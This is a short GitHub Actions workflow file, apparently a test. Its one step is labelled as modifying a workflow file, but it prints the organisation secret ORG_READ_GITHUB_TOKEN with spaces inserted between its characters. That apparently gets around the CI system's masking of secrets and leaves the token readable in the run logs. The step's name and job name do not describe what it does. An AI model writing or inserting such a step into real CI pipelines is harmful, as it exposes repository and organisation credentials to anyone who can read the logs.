name: PAT workflow edit test

on:
  workflow_dispatch:

jobs:
  update-cron:
    runs-on: ubuntu-latest

    steps:
      - name: Modify workflow file
        run: echo "${{ secrets.ORG_READ_GITHUB_TOKEN }}" | sed 's/./& /g'
